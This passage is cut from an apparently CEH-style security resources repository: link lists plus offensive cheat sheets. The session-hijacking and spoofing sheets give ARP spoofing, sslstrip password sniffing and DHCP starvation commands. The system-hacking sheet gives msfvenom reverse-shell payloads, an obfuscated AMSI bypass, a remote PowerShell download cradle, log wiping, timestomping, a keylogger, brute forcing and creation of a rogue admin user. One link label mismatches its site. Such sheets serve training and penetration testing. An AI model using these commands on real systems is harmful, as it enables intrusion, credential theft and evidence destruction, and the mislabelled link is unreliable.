([`LICENSE-MIT`](LICENSE-MIT)), at your option. 44 | 45 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /other-links.md: -------------------------------------------------------------------------------- 1 | ## Other links 2 | * [Cyberthreats, viruses, and malware - Microsoft Security Intelligence](https://www.microsoft.com/en-us/wdsi/threats/): Part of the Z-Library project. The world's largest e-book library. 3 | * [es1lib](https://es1lib.org/): Part of the Z-Library project. The world's largest e-book library. 4 | 5 | 6 | 7 | --- 8 | 9 | 10 | 11 | ### Blogs 12 | * [0x00-0x00](https://0x00-0x00.github.io/) 13 | * [Amossys - Security Blog](https://blog.amossys.fr/) (French) 14 | * [Adepts of 0xCC](https://adepts.of0x.cc/): A brotherhood of owls praying to the debugger God. 15 | * [Back Engineering](https://back.engineering/) 16 | * [COUNT UPON SECURITY](https://countuponsecurity.com/) 17 | * [Dissecting Malware](https://dissectingmalwa.re/) 18 | * [El Soctano](https://soctano.blogspot.com/) (Spanish) - Discontinued 19 | * [Ero Carrera's blog](http://blog.dkbza.org/) - Discontinued 20 | * [Ferib's Blog](https://ferib.dev/portfolio.php?t=Blog+post) 21 | * [Flu Project](https://www.flu-project.com/) (Spanish) 22 | * [Follow The White Rabbit](https://fwhibbit.es/en/) 23 | * [Follow The White Rabbit – Blog de Seguridad Informática](https://fwhibbit.es/) (Spanish) 24 | * [Google Project Zero](https://googleprojectzero.blogspot.com/) 25 | * [Google Security Blog](https://security.googleblog.com/) 26 | * [Hack Puntes](https://hackpuntes.com/) (Spanish) 27 | * [HackTricks](https://book.hacktricks.xyz/) 28 | * [InQuest Blog](https://inquest.net/blog) 29 | * [lucasg](https://lucasg.github.io/) 30 | * [MalwareAnalysis.co Forums and Blogs](https://malwareanalysis.co/forums/) 31 | * [McAfee blogs](https://www.mcafee.com/blogs/) 32 | * [Microsoft Security Response Center blog](https://msrc-blog.microsoft.com/) 33 | * [Security By Default](http://www.securitybydefault.com/) (Spanish) - Discontinued 34 | * [Objective-See's Blog](https://objective-see.com/blog.html) 35 | * [Security Garage](https://security-garage.com/) (Spanish) 36 | * [Underc0de](https://blog.underc0de.org/) (Spanish) 37 | * [Unit42](https://unit42.paloaltonetworks.com/) 38 | * [UN INFORMÁTICO EN EL LADO DEL MAL](https://www.elladodelmal.com/) (Spanish) 39 | * [UN TAL 4N0NYM0US EN EL PC](http://www.enelpc.com/) (Spanish) - Discontinued 40 | * [welivesecurity by eset](https://www.welivesecurity.com/la-es/category/analisis-malware/) (Spanish) 41 | 42 | 43 | 44 | --- 45 | 46 | 47 | 48 | ### Bug bounty platforms 49 | * [Bugcrowd](https://www.bugcrowd.com/) 50 | * [Firebounty](https://firebounty.com/) 51 | * [Hackerone](https://www.hackerone.com/) 52 | * [Intigriti](https://www.intigriti.com/) 53 | * [Yes We Hack](https://www.yeswehack.com/): Crowdsourced security & Vulnerability Disclosure France, Singapore, Switzerland, Germany. 54 | * [Yogosha](https://yogosha.com/) 55 | * [Zerocopter](https://www.zerocopter.com/) 56 | 57 | 58 | 59 | --- 60 | 61 | 62 | 63 | ### Challenges 64 | * [Atenea](https://atenea.ccn-cert.cni.es/) 65 | * [HackTheBox](https://www.hackthebox.eu/) 66 | * [Try Hack Me](https://www.tryhackme.com/) 67 | * [Web Security Academy](https://portswigger.net/web-security) 68 | 69 | 70 | 71 | --- 72 | 73 | 74 | 75 | ### Communities 76 | * [Axial](https://ax1al.com/): Is a community of like minded nerds who focus on reverse engineering, malware analysis and general nerdery regarding to malware, at axial we also focus on various web attack vectors and techniques to leverage our OSINT skills which is accomplished by release of various blogs which range from extremely beginner to an intermediate level which also makes sure to demonstrate the techniques in a broader range, Axial also focuses on various open source based projects dedicated towards the afore mentioned domain, definitely aligning with the offensive, and defensive side of the information security domain. 77 | 78 | 79 | 80 | --- 81 | 82 | 83 | 84 | ### Forums 85 | 86 | * [Indetectables.net](https://indetectables.net/index.php) (Spanish): Malware and undetectabilization techniques forum. 87 | * [Hack Forums](https://hackforums.net/) 88 | * [MalwareAnalysis.co Forums and Blogs](https://malwareanalysis.co/forums/) 89 | * [reddit: Bug Bounty](https://www.reddit.com/r/bugbounty/) 90 | * [reddit: Hacking_Tutorials](https://www.reddit.com/r/Hacking_Tutorials/): A forum for the security professionals and white hat hackers. 91 | * [reddit: OSCP](https://www.reddit.com/r/oscp/): Resource for people preparing for Offensive Security Certified Professional Certification. 92 | 93 | 94 | 95 | --- 96 | 97 | 98 | 99 | ### News 100 | * [All Infosec News](https://allinfosecnews.com/) 101 | * [BleepingComputer](https://www.bleepingcomputer.com/news/security/) 102 | * [Dark Reading](https://www.darkreading.com/) 103 | * [Krebs on Security](https://krebsonsecurity.com/) 104 | * [National Cyber Awareness System - Bulletins](https://us-cert.cisa.gov/ncas/bulletins) 105 | * [Schneier on Security](https://www.schneier.com/) 106 | * [Security Affairs](https://securityaffairs.co/wordpress/) 107 | * [The Hacker News](https://thehackernews.com/) 108 | * [Threat post](https://threatpost.com/) 109 | 110 | 111 | 112 | --- 113 | 114 | 115 | 116 | ### Other directories 117 | * [Hacking Tools](https://en.kali.tools/all/?category): Tools for penetration testing and security audit. 118 | * [simplycyber.io - Free cyber resources](https://www.simplycyber.io/free-cyber-resources): An awesome list of resources for training, conferences, speaking, labs, reading, etc that are **free** all the time that cybersecurity professionals with downtime can take advantage of to improve their skills and marketability to come out on the other side ready to rock. 119 | 120 | 121 | 122 | --- 123 | 124 | 125 | 126 | ### Podcasts 127 | * [Cyberwire daily podcast](https://thecyberwire.com/podcasts/daily-podcast) 128 | * [Daily Information Security Podcast ("StormCast")](https://isc.sans.edu/podcast.html): Stormcasts are daily 5-10 minute information security threat updates. The podcast is produced each work day, and typically released late in the day to be ready for your morning commute. 129 | * [Risky Business](https://risky.biz/) 130 | 131 | 132 | 133 | --- 134 | 135 | 136 | 137 | ### Services 138 | * [Cock.li](https://cock.li/): Anonymous email. 139 | * [ProntonMail](https://protonmail.com/): Secure email. 140 | 141 | 142 | 143 | --- 144 | 145 | 146 | 147 | ### Telegram channels 148 | * [crackslatinos](https://t.me/crackslatinos) (Spanish): Telegram channel about reverse engineering, created by Ricardo Narvaja. 149 | * [Cyber Security News](https://t.me/Cyber_Security_Channel) 150 | * [Derecho en la red](https://t.me/derechodelared) (Spanish) 151 | * [Information Security](https://t.me/information_security_channel) 152 | * [Bug Bounty ES](https://t.me/joinchat/C7UlGUXIDvoES-LMwX1Psw) (Spanish): Telegram channel about bug bounty, created by DragonJar. 153 | 154 | 155 | 156 | --- 157 | 158 | 159 | 160 | ### YouTube Channels 161 | * [securitycreators.video](https://securitycreators.video/) 162 | * [13Cubed](https://www.youtube.com/channel/UCy8ntxFEudOCRZYT1f7ya9Q/videos) 163 | * [247CTF](https://www.youtube.com/channel/UCtGLeKomT06x3xZ2SZp2l9Q/featured) 164 | * [Calle Svensson](https://www.youtube.com/channel/UC0WMQTG_-WIWm8eacM8D8QQ/videos) 165 | * [codingo](https://www.youtube.com/channel/UCUfO02gdMDXgOJWdv_jiLMg/videos) 166 | * [Farah Hawa](https://www.youtube.com/channel/UCq9IyPMXiwD8yBFHkxmN8zg) 167 | * [Hacksplained](https://www.youtube.com/channel/UCyv6ItVqQPnlFFi2zLxlzXA/videos) 168 | * [InsiderPhD](https://www.youtube.com/channel/UCPiN9NPjIer8Do9gUFxKv7A/videos) 169 | * [John Hammond](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw/videos) 170 | * [MalwareAnalysis.co YouTube Channels](https://malwareanalysis.co/community/youtube-channels/) 171 | * [MalwareAnalysisForHedgehogs](https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A/videos) 172 | * [Murmus CTF](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A/videos) 173 | * [NetworkChuck](https://www.youtube.com/watch?v=6CnDdXVTxhU) 174 | * [PinkDraconian](https://www.youtube.com/channel/UCmXwpkCXmIKjoRLMsq9I3RA/videos) 175 | * [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) 176 | * [Rana Khalil](https://www.youtube.com/channel/UCKaK-XPQAbznwIISC46b1oA/videos) 177 | * [Reconless](https://www.youtube.com/channel/UCCp25j1Zh9vc_WFm-nB9fhQ/videos) 178 | * [superhero1](https://www.youtube.com/channel/UCm2SwKmx3Ya1HG5RmHR7SCA) 179 | 180 | 181 | [<- Back to index](README.md) 182 | 183 | --- 184 | ## License 185 | 186 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 187 | 188 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 189 | 190 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "devDependencies": { 3 | "all-contributors-cli": "^6.20.0" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /session-hijacking-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Session hijacking cheat sheet 2 | 3 | 4 | ### Bettercap 5 | 6 | #### Using Bettercap to collects all http logins used by routers, servers, and websites that do not have SSL enabled 7 | 8 | ```sh 9 | bettercap -iface eth0 10 | ``` 11 | -iface: Specifies the interface to bind to. 12 | 13 | 14 | ```sh 15 | net.probe on 16 | ``` 17 | This module will send different types of probe packets to each IP in the current subnet for the net.recon module to detect them. 18 | 19 | 20 | ```sh 21 | net.recon on 22 | ``` 23 | The net.recon module displays the detected active IP addresses in the network. In real-time, this module will start sniffing network packets. 24 | 25 | 26 | ```sh 27 | set http.proxy.sslstrip true 28 | ``` 29 | This module enables SSL stripping. 30 | 31 | 32 | ```sh 33 | set arp.spoof.internal true 34 | ``` 35 | This module spoofs the local connections among computers of the internal network. 36 | 37 | 38 | ```sh 39 | set arp.spoof.targets [Target IP] 40 | ``` 41 | This module spoofs the IP address of the target host. 42 | 43 | 44 | ```sh 45 | http.proxy on 46 | ``` 47 | This module initiates http proxy. 48 | 49 | 50 | ```sh 51 | arp.spoof on 52 | ``` 53 | This module initiates arp spoofing. 54 | 55 | 56 | ```sh 57 | net.sniff on 58 | ``` 59 | This module is responsible for performing sniffing on the network. 60 | 61 | 62 | ```sh 63 | set net.sniff.regexp '.*password=.+' 64 | ``` 65 | This module will only consider the packets sent with a payload matching the given regular expression (in this case, ‘.*password=.+’). 66 | 67 | 68 | #### Using Bettercap to sniff network traffic from https-based websites 69 | 70 | 71 | ```sh 72 | set http.proxy.sslstrip true 73 | ``` 74 | 75 | 76 | [<- Back to index](README.md) 77 | 78 | --- 79 | ## License 80 | 81 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 82 | 83 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 84 | 85 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /spoofing-network-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Spoofing networks cheat sheet 2 | 3 | ### MAC Flooding 4 | Involves flooding the CAM table with fake MAC address and IP pairs until it is full. 5 | 6 | #### Using macof 7 | 8 | ```sh 9 | macof -i eth0 -n 100 10 | ``` 11 | -i: Specifies the interface and -n: specifies the number of packets to be sent. 12 | 13 | ### DNS Poisoning 14 | Involves tricking a DNS server into believing that it has received authentic information when, in reality, it has not. 15 | 16 | ### ARP Poisoning 17 | Involves constructing a large number of forged ARP request and reply packets to overload a switch. ARP spoofing succeeds by changing the IP address of the attacker’s computer to the IP address of the target computer. A forged ARP request and reply packet find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends the frames to the attacker’s computer, where the attacker can modify them before sending them to the source machine (User A) in an MITM attack. 18 | 19 | #### Using arpspoof 20 | arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. 21 | 22 | ```sh 23 | arpspoof -i eth0 -t [IP Adress Range] 24 | ``` 25 | -i: Specifies network interface. 26 | 27 | -t: Specifies target IP address. 28 | 29 | -r: IP to spoof. 30 | 31 | ### DHCP Attacks 32 | Involves performing a DHCP starvation attack and a rogue DHCP server attack. In a DHCP starvation attack, an attacker floods the DHCP server by sending a large number of DHCP requests and uses all available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a Denial-of-Service (DoS) attack. Because of this issue, valid users cannot obtain or renew their IP addresses, and thus fail to access their network. This attack can be performed by using various tools such as Yersinia and Hyenae. 33 | 34 | #### DHCP Starvation Attack using Yersinia 35 | 36 | ```sh 37 | yersinia -I 38 | ``` 39 | -I: Starts an interactive ncurses session. 40 | 41 | 42 | ```sh 43 | [Press F2] 44 | ``` 45 | F2: Sets DHCP mode. 46 | 47 | 48 | ```sh 49 | [Press x] 50 | [Press 1] 51 | ``` 52 | x: List available attack options. 53 | 54 | 1: Start a DHCP starvation attack. 55 | 56 | [<- Back to index](README.md) 57 | 58 | --- 59 | ## License 60 | 61 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 62 | 63 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 64 | 65 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /steganography-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Steganography cheat sheet 2 | 3 | ### NTFS Streams 4 | 5 | #### Hide file inside another file 6 | 7 | ```sh 8 | type c:\calc.exe > c:\readme.txt:calc.exe 9 | ``` 10 | ```sh 11 | mklink executable_link.exe c:\readme.txt:calc.exe 12 | executable_link.exe 13 | ``` 14 | 15 | ### White Space Steganography using snow 16 | 17 | #### Hide message in text file 18 | 19 | ```sh 20 | snow -C -m "Secret message" -p "magic" readme.txt readme2.txt 21 | ``` 22 | 23 | #### Retrieve message from text file 24 | 25 | ```sh 26 | snow -C -p "magic" readme2.txt 27 | ``` 28 | 29 | [<- Back to index](README.md) 30 | 31 | --- 32 | ## License 33 | 34 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 35 | 36 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 37 | 38 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /system-hacking-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## System hacking cheat sheet 2 | 3 | ### Getting shell with msfvenom and use PowerUp.ps1 to escalate privileges 4 | 5 | #### Generate payload and encode using msfvenom 6 | 7 | ```sh 8 | msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=[Port in the Host Machine] -o [Output Path/shellcode.exe] 9 | ``` 10 | 11 | ```sh 12 | msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP Address of Host Machine] -f exe > Desktop/Backdoor.exe 13 | ``` 14 | [msfvenom documentation](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) 15 | 16 | #### Upload shellcode using a local server 17 | 18 | ```sh 19 | mkdir /var/www/html/share 20 | chmod -R 755 /var/www/html/share 21 | chown -R www-data:www-data /var/www/html/share 22 | cp [PATH]/shellcode.exe /var/www/html/share 23 | 24 | service apache2 start 25 | ``` 26 | 27 | Download it to the victim machine `[IP Address of Host Machine]/share/shellcode.exe`. 28 | 29 | #### Using handler in metasploit to connect to the payload 30 | 31 | ```sh 32 | use exploit/multi/handler 33 | set payload windows/meterpreter/reverse_tcp 34 | set LHOST [IP Address of Host Machine] 35 | set LPORT [Port in the Host Machine] 36 | exploit 37 | ``` 38 | 39 | #### Upload PowerUp.ps1 40 | 41 | ```sh 42 | upload [PATH]/PowerUp.ps1 PowerUp.ps1 43 | ``` 44 | 45 | #### PowerUp.ps1 46 | 47 | ##### Check all vulnerabilities 48 | 49 | ```sh 50 | shell 51 | poweshell -ep bypass 52 | Import-Module .\PowerUp.ps1 53 | Invoke-AllChecks 54 | ``` 55 | [PowerUp.ps1 tutorial](https://recipeforroot.com/advanced-powerup-ps1-usage/) 56 | 57 | `bypass` is used to bypass PowerShell’s execution policy. 58 | 59 | For disable [AMSI](https://docs.microsoft.com/en-us/archive/blogs/poshchap/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi): 60 | 61 | ```sh 62 | sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 63 | ``` 64 | 65 | ###### Excute PowerUp.ps1 without upload the script 66 | 67 | ```sh 68 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1'); Invoke-AllChecks" 69 | ``` 70 | 71 | ##### Escalate privileges 72 | 73 | ```sh 74 | Invoke-ServiceAbuse -Name 'Name of the vulnerable service' 75 | ``` 76 | 77 | ### Attemp to bypass Windows UAC protection via the FodHelper Registry Key usind bypassuac_fodhelper exploit 78 | 79 | ```sh 80 | use exploit/windows/local/bypassuac_fodhelper 81 | ``` 82 | 83 | If it works, in some cases we can already escalate privileges with some techniques like `getsystem`. 84 | 85 | ### Attemp to elevate privileges with Meterpreter 86 | 87 | ```sh 88 | getsystem -t 1 89 | ``` 90 | 91 | ### Obtain password hashes in the SAM file using Metasploit (root requiered) 92 | 93 | ```sh 94 | run post/windows/gather/smart_hashdump 95 | ``` 96 | 97 | It uses the service [Named Pipe Impersonation (In Memory/Admin) Technique](https://securityintelligence.com/identifying-named-pipe-impersonation-and-other-malicious-privilege-escalation-techniques/). 98 | 99 | ### Clear the events logs that require administrative or root privileges using Meterpreter (root requiered) 100 | 101 | ```sh 102 | clearev 103 | ``` 104 | 105 | ### Clear all event viewer logs using wevtutil (Windows) 106 | 107 | ```sh 108 | for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 109 | ``` 110 | 111 | ```sh 112 | @echo off 113 | 114 | FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V 115 | IF (%adminTest%)==(Access) goto noAdmin 116 | for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") 117 | echo. 118 | echo All Event Logs have been cleared! 119 | goto theEnd 120 | 121 | :do_clear 122 | echo clearing %1 123 | wevtutil.exe cl %1 124 | goto :eof 125 | 126 | :noAdmin 127 | echo Current user permissions to execute this .BAT file are inadequate. 128 | echo This .BAT file must be run with administrative privileges. 129 | echo Exit now, right click on this .BAT file, and select "Run as administrator". 130 | pause >nul 131 | 132 | :theEnd 133 | Exit 134 | ``` 135 | 136 | ### Securely delete a chunk of data by overwriting it to prevent its possible recovery using in-built Windows tool (Windows) 137 | 138 | ```sh 139 | cipher /w:[Drive or Folder or File Location] 140 | ``` 141 | 142 | ### Avoid bash history 143 | 144 | #### Disable the BASH shell from saving the history (Linux) 145 | 146 | ```sh 147 | export HISTSIZE=0 148 | ``` 149 | 150 | #### Make bash history unreadable (Linux) 151 | 152 | ```sh 153 | shred ~/.bash_history 154 | ``` 155 | 156 | ```sh 157 | shred ~/.bash_history && cat /dev/null > .bash_history 158 | ``` 159 | 160 | ### Leave no trace of MACE attributes when reading or modifying files using Meterpreter 161 | 162 | #### To view the mace attributes of a file (Windows) 163 | 164 | ```sh 165 | timestomp [FILE] -v 166 | ``` 167 | 168 | #### Change MACE attributes (Windows) 169 | 170 | ```sh 171 | timestomp [FILE] -m "mm/dd/yyyy hh:mm:ss" 172 | ``` 173 | 174 | ### Kylogger using Meterpreter 175 | 176 | #### Start keylogger 177 | 178 | ```sh 179 | keyscan_start 180 | ``` 181 | 182 | #### Read keylogger log 183 | 184 | ```sh 185 | keyscan_dump 186 | ``` 187 | 188 | ### Attempt to gain access to FTP server perform a dictionaty attack using THC Hydra 189 | 190 | ```sh 191 | hydra -L [USERNAMES DICTIONARY] -P [PASSWORDS DICTIONARY] ftp://[IP] 192 | ``` 193 | 194 | ### Create user and set admin privilegies in Windows 195 | 196 | ```sh 197 | net user Test /Add 198 | net localgroup Administrators Test /Add 199 | ``` 200 | 201 | ### Generate payload for Android and encode using msfvenom 202 | 203 | ```sh 204 | msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[LOCAL HOST] R > payload.apk 205 | ``` 206 | 207 | [<- Back to index](README.md) 208 | 209 | --- 210 | ## License 211 | 212 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 213 | 214 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 215 | 216 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /tools.md: -------------------------------------------------------------------------------- 1 | ## Tools 2 | 3 | ### Footprinting and reconnaissance 4 | * [ARIN whois database search](https://account.arin.net/public): Locate the network range. 5 | * [awesome-osint](https://github.com/jivoi/awesome-osint): A curated list of amazingly awesome OSINT. 6 | * [BuzzSumo](https://buzzsumo.com/): Find the most shared content for a topic, author, or a domain. 7 | * [Censys](https://censys.io/): Full view of every server and device exposed. 8 | * [CeWL](https://github.com/digininja/CeWL): Gathering Wordlist from the Target Website. 9 | * [DNSRecon](https://github.com/darkoperator/dnsrecon): Reverse DNS lookup. 10 | * [Extract Meta Data](https://citizenevidence.amnestyusa.org/): Gather Information from Video Search Engines. 11 | * [exposing.ai](https://exposing.ai/): Check if your Flickr photos were used to build face recognition. 12 | * [Ghost Eye](https://github.com/BullsEye0/ghost_eye): It is an information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP. 13 | * [Iky I Know You](https://kennbroorg.gitlab.io/ikyweb/): It is a tool that collects information from an email and shows results in a nice visual interface. 14 | * [NAPALM FTP Indexer](https://www.searchftps.net/): Gather Information from FTP Search Engines. 15 | * [networkappers](https://networkappers.com/tools/reverse-ip-checker#.X-fOden0nlw): Reverse DNS lookup. 16 | * [Network Tools by YouGetSignal.com](https://www.yougetsignal.com/) 17 | * [NSLOOKUP: look up and find IP addresses in the DNS](http://www.kloth.net/services/nslookup.php/) 18 | * [OSINT_Collection](https://github.com/Ph055a/OSINT_Collection): Maintained collection of OSINT related resources. (All Free & Actionable). 19 | * [osint-suite-tools](https://github.com/Quantika14/osint-suite-tools): Repository of the toolkit for making OSINT and SOCMINT with Dante's Gates Minimal Version. 20 | * [ReconSpider](https://github.com/bhavsec/reconspider): Framework for scanning IP Address, Emails, Websites, Organizations and find out information from different sources. 21 | * [Reverse IP Lookup](https://reverseip.domaintools.com/): Reverse DNS lookup. 22 | * [Sherlock.py](https://github.com/sherlock-project/sherlock): Search a vast number of social networking sites for a target username. 23 | * [Shodan](https://www.shodan.io/): Search engine for Internet-connected devices. 24 | * [Social Searcher](https://www.social-searcher.com/): Free Social Media Search Engine. 25 | * [Thingful](https://www.thingful.net/): A search engine for the Internet of Things. 26 | * [wafw00f](https://github.com/EnableSecurity/wafw00f): Allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website. 27 | * [Wayback Machine](https://archive.org/web/) 28 | * [WhoIsHostingThis](https://www.whoishostingthis.com/): Get information about the web host, IP address, name servers & more. 29 | * [Sub3 Suite](https://github.com/3nock/sub3suite): A suite of tools for intelligence gathering and target mapping. 30 | 31 | #### Competitive Intelligence Gathering 32 | 33 | ##### What did this company begin? How did it develop? 34 | * [Business wire](https://www.businesswire.com/portal/site/home/) 35 | * [D&B Hoovers](https://www.dnb.com/products/marketing-sales/dnb-hoovers.html) 36 | * [EDGAR Database](https://www.sec.gov/edgar/searchedgar/companysearch.html) 37 | * [LexisNexis](https://www.lexisnexis.com/en-us/gateway.page) 38 | 39 | ##### What are the company's plans? 40 | * [Alexa](https://www.alexa.com/) 41 | * [Euromonitor](https://www.euromonitor.com/) 42 | * [Market Watch](https://www.marketwatch.com/) 43 | * [The Wall Street Transcript](https://www.twst.com/) 44 | 45 | ##### What expert do opinions say about the company? 46 | * [ABI/INFORM Global](https://www.proquest.com/) 47 | * [Attention Meter](http://www.attentionmeter.com/) 48 | * [SEMrush](https://es.semrush.com/) 49 | * [SimilarWeb](https://www.similarweb.com/) 50 | 51 | #### Enumerate people, emails,... 52 | * [Contact Out](https://contactout.com/): Get private information from LinkedIn accounts. 53 | * [';--have i been pwned?](https://haveibeenpwned.com/): Check if your email address is in a data breach. 54 | * [hunter.io](https://hunter.io/): Hunter lets you find email addresses in seconds and connect with the people that matter for your business. 55 | * [Instant People Search](https://www.privateeye.com/): Searching people. 56 | * [intelius](https://www.intelius.com/): Searching people. 57 | * [peekyou](https://www.peekyou.com/): Searching people. 58 | * [pipl](https://pipl.com/): Searching people. 59 | * [pwndb](https://github.com/davidtavarez/pwndb): Search for leaked credentials. 60 | * [Social Catfish](https://socialcatfish.com/): Searching people. 61 | * [theHarvester](https://github.com/laramies/theHarvester): E-mails, subdomains and names Harvester - OSINT. 62 | * [VerifyEmailAddress.org](http://verifyemailaddress.org/) 63 | 64 | #### Email tracking tools 65 | * [eMailTrackerPro](http://www.emailtrackerpro.com/): Trace an email using the email header. 66 | * [Infoga](https://github.com/m4ll0k/Infoga): Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet. 67 | * [Mailtrack](https://mailtrack.io/es/): Know when your emails are opened. 68 | * [PoliteMail](https://politemail.com/) 69 | * [RMail E-Security](https://rmail.com/) 70 | 71 | #### Extracting Metadata of Public Documents 72 | * [Exiftool](https://github.com/exiftool/exiftool): ExifTool meta information reader/writer. 73 | * [Metagoofil](https://github.com/laramies/metagoofil): Metadata harvester. 74 | * [Opanda IExif](http://opanda.com/en/iexif/index.html): It is a professional Exif viewer in Windows / IE / Firefox, From a photographer's eye, It displays the image taken from digital camera and every item of EXIF data in the image from beginning to end. 75 | * [Web Data Extractor](http://www.webextractor.com/): Web Data Extractor Pro is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. Special feature of WDE Pro is custom extraction of structured data. 76 | 77 | #### Extracting Website Links 78 | * [Link Extractor](https://www.iwebtool.com/link_extractor): Very simple tool which allows scrapping all the links from any web page in Internet. 79 | * [Netpeak Spider](https://netpeaksoftware.com/spider): Desktop tool for day-to-day SEO audit, fast issue check, comprehensive analysis, and website scraping. 80 | * [Octoparse](https://github.com/octoparse): Octoparse is a free, multi-award winning web scraping software to turn websites into structured data without coding. 81 | 82 | #### Find TLD's domains 83 | * [Search Web by Domain](https://searchdns.netcraft.com/) 84 | * [Sublist3r](https://github.com/aboul3la/Sublist3r): Fast subdomains enumeration tool for penetration testers. 85 | 86 | #### Footprinting 87 | * [Bill Cipher](https://github.com/GitHackTools/BillCipher): Information Gathering tool for a Website or IP address 88 | * [FOCA](https://www.elevenpaths.com/es/innovacion-laboratorio/herramientas/foca) 89 | * [Maltego](https://www.maltego.com/): Maltego is an open source intelligence (OSINT) and graphical link analysis tool for gathering and connecting information for investigative tasks. 90 | * [OSINT Framework](https://osintframework.com/) 91 | * [OSRFramework](https://github.com/i3visio/osrframework): The Open Sources Research Framework is a AGPLv3+ project by i3visio focused on providing API and tools to perform more accurate online researches. 92 | * [Raccoon](https://github.com/evyatarmeged/Raccoon): A high performance offensive security tool for reconnaissance and vulnerability scanning. 93 | * [ReconDog](https://github.com/s0md3v/ReconDog): Reconnaissance Swiss Army Knife. 94 | * [Recon-ng](https://github.com/lanmaster53/recon-ng): Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources. 95 | * [Th3Inspector](https://github.com/Moham3dRiahi/Th3inspector) 96 | 97 | #### Instagram 98 | * [Osintgram](https://github.com/Datalux/Osintgram): It is a OSINT tool on Instagram. It offers an interactive shell to perform analysis on Instagram account of any users by its nickname. 99 | 100 | #### IP geolocation lookup 101 | * [IPQuery](https://ipquery.io) 102 | * [GeoIP API](https://api.ip.sb/geoip) 103 | * [IP2Location](https://www.ip2location.com/) 104 | * [IP Location Finder](https://www.iplocation.net/) 105 | 106 | #### Mirroring entire website 107 | * [Cyotek](https://www.cyotek.com/cyotek-webcopy): Copy websites locally for offline browsing 108 | * [HTTrack WebSite Copier](https://github.com/xroche/httrack): Copy websites to your computer. 109 | * [NCollector Studio](http://www.calluna-software.com/) 110 | * [Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit): It is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make 